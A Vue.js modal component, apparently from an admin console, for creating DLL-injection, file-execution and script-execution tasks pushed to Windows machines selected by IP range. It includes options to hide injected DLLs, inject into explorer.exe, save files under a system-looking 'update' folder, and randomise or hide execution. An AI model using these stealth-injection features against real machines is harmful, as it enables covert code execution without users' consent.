<template>
  <default-model class="editorCon" :modelType="modelType" :loading="loading"  v-show="visible" :title="title" :confirmText="confirmText" @confirmFn="confirmFn" @closeFn="closeFn">
    <div class="modal-body " >
      <Form :label-width="90"  :model="form" ref="form" :rules="ruleValidate">
        <FormItem label="任务名称" prop="title">
          <Input v-model="form.title" placeholder="请输入任务名称"></Input>
        </FormItem>
        <template v-if="modelType !=3">
          <FormItem label="文件类型" prop="fileType" class="marginBot10">
            <Radio-group v-model="form.fileType">
                <Radio label="1">本地文件</Radio>
                <Radio label="2">云端文件</Radio>
                <Radio label="0">网络文件</Radio>
            </Radio-group>
          </FormItem>
          <FormItem>
            <b v-if="form.fileType ==2" class="errorCol f12">*单文件最大支持64MB,支持内网P2P分发</b>
            <b v-if="form.fileType ==0" class="errorCol f12">*仅支持http或https下载地址，链接必须以.exe结尾</b>
          </FormItem>
          <FormItem label="文件路径" prop="filePath" v-if="form.fileType ==1">
            <Input class="f12" placeholder="请输入本地文件的绝对路径" v-model="form.filePath"/>
          </FormItem>
          <template v-else-if="form.fileType ==0" >
            <FormItem label="文件路径" prop="filePath" >
              <Input class="f12" placeholder="请输入文件的下载地址" v-model="form.filePath"/>
            </FormItem>
            <FormItem label="保存路径"  class="marginBot10">
                  <Input placeholder="请输入存储文件的绝对路径" style="width:240px;" v-model="form.downDir"/>
                  <p>空表示默认路径（默认路径 C:\Windows\update\channelPkg）</p>
            </FormItem>
          </template>
          <template v-else>
              <FormItem label="选择文件" prop="downDir" class="marginBot10">
                <div @click="selectFileFn" style="display:inline-block;">
                  <Input  style="width:150px;" v-model="form.filePath"/>
                  <Button type="info" icon="ios-cloud-upload-outline">选择文件</Button>
                </div>
              </FormItem>
              <FormItem label="保存路径"  class="marginBot10">
                <Input placeholder="请输入存储文件的绝对路径" style="width:240px;" v-model="form.downDir"/>
                <p>空表示默认路径（默认路径 C:\Windows\update\channelPkg）</p>
              </FormItem>
          </template>
          <!-- <FormItem label="选择宿主" prop="hostPro" v-if="modelType !=1">
            <Select v-model="form.hostPro" placeholder="请选择宿主程序">
                  <Option v-for="(item,index) in  hostList" :key="index" :value="item">{{ item }}</Option>
              </Select>
          </FormItem> -->
        </template>
        <template v-else>
          <FormItem label="脚本内容" prop="name">
            <aceCom ref="aceCom" :content="shellContent"/>
            <!-- <div class="fl shellContentLeft tar">
              <ul>
                <li v-for="(item,index) in form.shellContent" :key="index">{{ index+1 }}</li>
              </ul>
            </div>
            <textarea class="shellContent" v-model="form.shellContent" placeholder="请输入脚本内容"></textarea> -->
          </FormItem>
        </template>
        <FormItem label="命令行参数" v-if="modelType ==2">
          <Input placeholder="请输入命令行参数"  v-model="form.cmdParam"/>
        </FormItem>
        <!-- <FormItem label="加载类型"  class="marginBot10" prop="loaderType"  v-if="modelType ==1">
          <Row :gutter="16">
              <Col span="16"><Select v-model="form.loaderType" placeholder="请选择加载类型">
                      <Option value="1">安全中心驱动注入加载</Option>
                      <Option value="2">客户端注入加载</Option>
                  </Select></Col>
              <Col span="8" v-if="form.loaderType ==1 && form.fileType ==2">
                <Checkbox v-model="hideDllFlag">隐藏dll文件</Checkbox>
              </Col>
          </Row>
        </FormItem> -->
        <FormItem label="注入对象" class="marginBot10" prop="dllObjList"   v-if="modelType ==1">
          <Button type="info" @click="addFn"><Icon type="ios-plus-outline"></Icon>添加注入对象</Button>
          <Table :columns="columns" :data="form.dllObjList">
            <template slot-scope="{row,index}" slot="index">
              对象{{ index+1 }}
            </template>
            <template slot-scope="{row,index}" slot="action">
              <Button type="warning"  size="small" class="marleft4" @click.stop="delObj(row)">删除</Button>
            </template>
          </Table>
        </FormItem>
        <Row :gutter="16"   v-if="modelType ==1">
          <Col span="12">
            <FormItem label="注入时机" class="marginBot10" prop="injectMoment">
          <Radio-group v-model="form.injectMoment">
              <Radio label="1">启动时</Radio>
              <Radio label="2">启动后</Radio>
          </Radio-group>
            </FormItem>
          </Col>
          <Col span="12" v-if="form.injectMoment == 2">
            <FormItem label="延时注入">
              <Input-number  :min="0" v-model="form.delayedInjection"></Input-number>
           秒
            </FormItem>
          </Col>
        </Row>
        <Row :gutter="16">
          <Col span="12">
            <FormItem label="支持系统" class="marginBot10">
              <Checkbox-group v-model="form.fitOsList">
                  <Checkbox label="1">Win7</Checkbox>
                  <Checkbox label="2">Win10</Checkbox>
                  <Checkbox label="3">Win11</Checkbox>
              </Checkbox-group>
            </FormItem>
          </Col>
        </Row>
        <FormItem label="执行时间" v-if="modelType !=1">
          <Collapse v-model="isPanel">
            <Panel name="1">
              <Checkbox
            :indeterminate="indeterminate"
            :value="checkAll"
            @click.prevent.native="handleCheckAll">全时段</Checkbox>
            <p slot="content">
              <Checkbox-group v-model="form.executeTimeList" @on-change="checkAllGroupChange">
                <Row>
                  <Col span="3" v-for="(item,index) in 24" :key="index"><Checkbox :label="index">{{index}}:00</Checkbox></Col>
              </Row>
            </Checkbox-group>
            </p>
        </Panel>
          </Collapse>
        </FormItem>
        <Row :gutter="16">
          <Col span="12">
            <FormItem label="超级执行">
              <i-switch v-model="form.superFlag">
                </i-switch>
            </FormItem>
          </Col>
          <Col span="12" v-if="modelType !=1">
            <FormItem label="延时执行">
              <Input-number  :min="0" :max="255" v-model="form.delayedExecute"></Input-number> 秒
            </FormItem>
          </Col>
          <Col span="12" v-if="modelType ==1">
            <FormItem label="注入次数">
              <Input-number  :min="0" :max="254" v-model="form.injectNum"></Input-number>
           0无限
            </FormItem>
          </Col>
        </Row>
        <Row :gutter="16" v-if="modelType !=1">
          <Col span="12">
            <FormItem label="界面显示" class="pr">
              <Tooltip v-if="modelType !=3"  class="pa toolCon" style="left:-80px;"  placement="top-start" content="使用桌面相关的功能请开启显示界面，否则可能失效！">
                        <Icon type="ios-help isoHelp"></Icon>
              </Tooltip>
              <i-switch v-model="form.showFlag">
                </i-switch>
            </FormItem>
          </Col>
          <Col span="12">
            <FormItem label="执行机率">
              <Input-number  :min="0" :max="100" v-model="form.executeProbability"></Input-number>
           %
            </FormItem>
          </Col>
        </Row>
        <Row :gutter="16">
          <Col span="12">
            <FormItem label="起始IP">
              <Input v-model="form.beginIp" @on-blur="startIp"/>
            </FormItem>
          </Col>
          <Col span="12">
            <FormItem label="结束IP">
              <Input v-model="form.endIp"  @on-blur="startIp"/>
            </FormItem>
          </Col>
        </Row>
        <FormItem label="任务说明" prop="description" class="marginBot10">
          <Input v-model="form.description" type="textarea" :autosize="{minRows: 2}" placeholder="请输入任务说明" :maxlength="255"></Input>
        </FormItem>
      </Form>
      <proModel   ref="proModelCom" @addJson="addJson"/>
      <fileCom  ref="fileCom" :fileId="form.fileId" :type="modelType" @selectFn="selectFn"/>
    </div>
  </default-model>
</template>
<script>
import DefaultModel from './defaultModel.vue'
import proModel from './pro.vue'
import fileCom from './file.vue'
import aceCom from './ace.vue'
import {exeStrategyEditor, edit, getHostProcs} from '@/requests/task'
import {Base64} from 'js-base64'
export default {
  props: ['selectVal'],
  components: {
    proModel,
    DefaultModel,
    fileCom,
    aceCom
  },
  data() {
    return {
      hideDllFlag: true,
      modelType: 1,
      fileVisible: false,
      title: '新建',
      confirmText: '确定',
      visible: false,
      type: 1,
      isPanel: '',
      form: {
        type: 1,
        name: '',
        description: '',
        fileType: '1',
        filePath: '',
        hideDllFlag: true,
        hostPro: 'explorer.exe',
        loaderType: '1',
        injectMoment: '1',
        delayedInjection: 0,
        beginIp: '0.0.0.0',
        executeProbability: 100,
        endIp: '255.255.255.255',
        injectNum: 0,
        superFlag: false,
        fitOsList: ['1', '2', '3'],
        fileId: '',
        dllObjList: [],
        downDir: '',
        delayedExecute: 0,
        showFlag: false,
        executeTimeList: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
        shellContent: '',
        cmdParam: ''
      },
      columns: [
        {
          type: 'id',
          slot: 'index',
          align: 'center'
        },
        {
          title: '父进程',
          key: 'parentProcValue',
          align: 'center'
        },
        {
          title: '子进程',
          key: 'childProcValue',
          align: 'center'
        },
        {
          title: '进程层级',
          key: 'procLevel',
          align: 'center'
        },
        {
          title: '操作',
          slot: 'action',
          align: 'center'
        },
      ],
      ruleValidate: {
        title: [
          { required: true, message: '任务名称不能为空', trigger: 'blur' },
          { type: 'string', max: 20, message: '名称不能大于20字符', trigger: 'blur' }
        ],
        fileType: [
          { required: true, message: '请选择文件类型', trigger: 'change' }
        ],
        filePath: [
          { required: true, message: '文件路径不能为空', trigger: 'blur' },
        ],
        // hostPro: [
        //   { required: true, message: '请选择宿主程序', trigger: 'change' }
        // ],
        loaderType: [
          { required: true, message: '请选择文件类型', trigger: 'change' }
        ],
        injectMoment: [
          { required: true, message: '请选择文件类型', trigger: 'change' }
        ],
        dllObjList: [
          { required: true, type: 'array', min: 1, message: '至少添加一个目标对象', trigger: 'change' },
          { type: 'array', trigger: 'change' }
        ]
      },
      loading: false,
      indeterminate: false,
      checkAll: true,
      hostList: [],
      shellContent: ''
    }
  },
  watch: {
    // form(){

    // },
    visible() {
      if (this.visible) {
        this.indeterminate = false
        this.checkAll = false
        this.getHostProcs()
        if (this.form.executeTimeList && this.form.executeTimeList.length == 24) {
          this.checkAll = true
        } else {
          if (this.form.executeTimeList != '' && this.form.executeTimeList != undefined && this.form.executeTimeList.length > 0) {
            this.indeterminate = true
          }
        }
      }

      let msg = ''
      if (this.type == 1) {
        msg = '新建'
        this.hideDllFlag = true
      } else {
        msg = '编辑'
        this.hideDllFlag = Boolean(this.form.hideDllFlag)
      }
      if (this.modelType == 1) {
        this.title = msg + 'DLL注入任务'
        this.form.type = 1
      } else if (this.modelType == 2) {
        this.title = msg + '执行文件任务'
        this.form.type = 2
      } else {
        this.form.type = 2
        this.form.fileType = 3
        this.title = msg + '执行脚本任务'
        if (this.type != 1) {
          this.shellContent = Base64.decode(this.form.shellContent).replace('\r\n', '\n')
        } else {
          this.shellContent = ''
        }
      }
    },
    openType() {
      if (this.openType == 1) {
        this.title = '批量开启'
      } else if (this.openType == 2) {
        this.title = '批量删除'
      } else {
        this.title = '批量停用'
      }
    }
  },
  methods: {
    booleanFn(val) {
      return Boolean(val)
    },
    startIp(val) {
      console.log(val)
      if (this.form.beginIp == '') {
        this.form.beginIp = '0.0.0.0'
      }
      if (this.form.endIp == '') {
        this.form.endIp = '255.255.255.255'
      }
    },
    async getHostProcs() {
      let res = await getHostProcs()
      if (res.code == 200) {
        // this.hostList = res.data
        this.hostList = ['explorer.exe']
        this.form.hostPro = 'explorer.exe'
      }
    },
    handleCheckAll () {
      this.isPanel = true
      if (this.indeterminate) {
        this.checkAll = false;
      } else {
        this.checkAll = !this.checkAll;
      }
      this.indeterminate = false;
      if (this.checkAll) {
        this.form.executeTimeList = [];
        for (let index = 0; index < 24; index++) {
          this.form.executeTimeList.push(index)
        }
      } else {
        this.form.executeTimeList = [];
      }
    },
    checkAllGroupChange (data) {
      if (data.length === 3) {
        this.indeterminate = false;
        this.checkAll = true;
      } else if (data.length > 0) {
        this.indeterminate = true;
        this.checkAll = false;
      } else {
        this.indeterminate = false;
        this.checkAll = false;
      }
    },
    selectFn(val) {
      this.form.fileId = val.fileId
      this.form.filePath = val.fileOriginName
    },
    selectFileFn() {
      this.$refs.fileCom.visible = true
    },
    addJson(json) {
      this.form.dllObjList.unshift(json)
    },
    addFn() {
      this.$refs.proModelCom.visible = true
    },
    delObj(val) {
      this.form.dllObjList.splice(val, 1)
    },
    confirmFn() {
      // console.log(this.form.executeTimeList)
      // console.log(123)
      // console.log(this.form)
      this.$refs.form.validate((valid) => {
        if (valid) {
          if (this.modelType == 3) {
            if (this.$refs.aceCom.getValue() == '') {
              this.$Message.error('脚本内容不能为空')
              return
            }
          }
          if (this.form.fileType == 2) {
            if (this.form.fileId == '') {
              this.$Message.error('请选择文件')
              return
            }
            if (this.form.downDir != '') {
              let res = /^[a-zA-Z]:(([a-zA-Z]*)||([a-zA-Z]*\\))*/
              if (!res.test(this.form.downDir)) {
                this.$Message.error('请检查保存路径是否是绝对路径')
                return
              }
            }
          } else if (this.form.fileType == 0) {
            if (!/^https?:\/\//.test(this.form.filePath)) {
              this.$Message.error('请输入正确的下载地址')
              return
            }
            if (!/^.*?\.(exe)$/.test(this.form.filePath)) {
              this.$Message.error('下载地址结尾必须以.exe结尾')
              return
            }
          }
          this.editor()
        }
      })
    },
    async editor() {
      this.loading = true
      this.form.hideDllFlag = Number(this.hideDllFlag)
      this.form.superFlag = Number(this.form.superFlag)
      this.form.showFlag = Number(this.form.showFlag)
      if (this.form.injectNum == 0) {
        this.form.injectNum = 255
      }
      if (this.modelType == 3) {
        let str = this.$refs.aceCom.getValue().replace('\n', '\r\n')
        this.form.shellContent = Base64.encode(str)
      }
      let res = ''
      if (this.modelType == 1) {
        res = await edit(this.form)
      } else {
        res = await exeStrategyEditor(this.form)
      }
      this.loading = false
      if (res.code == 200) {
        this.$emit('reshFn')
        this.visible = false
      } else {
        this.$Message.error(res.msg)
      }
    },
    closeFn() {
      this.visible = false
    },
  }
}
</script>
<style lang="scss">
.editorCon{
    .inMaskCon {
      width: 800px !important;
    }
  .ivu-form-item.ivu-form-item-required{
    margin-bottom: 20px;
  }
  .ivu-btn-ghost{
    color: #000;
  }
  .ivu-table-wrapper{
    margin-top: 10px;
  }
  .ivu-table-header thead tr th{
    padding: 0px 0;
  }
  .marginBot10{
    margin-bottom: 10px !important;
  }
}
.isoHelp{
  font-size: 14px;
  color: red;
  border: 1px solid red;
  border-radius: 50px;
  top: 50%;
  font-weight: bold;
  margin-top: -12px;
}
.toolCon{
  .ivu-tooltip-inner{
    width: 300px;
    white-space:normal;
  }
}
.shellContentLeft{
  width: 40px;
  height: 200px;
  padding-right: 4px;
  background: #3b3b3b;
  overflow: auto;
  color: rgb(153,153,153);

}
.shellContent{
  width: calc(100% - 100px);
  height: 200px;
  background: #323232;
  color: #fff;
  padding: 10px;
  box-sizing: border-box;
  line-height: 24px;

}
</style>
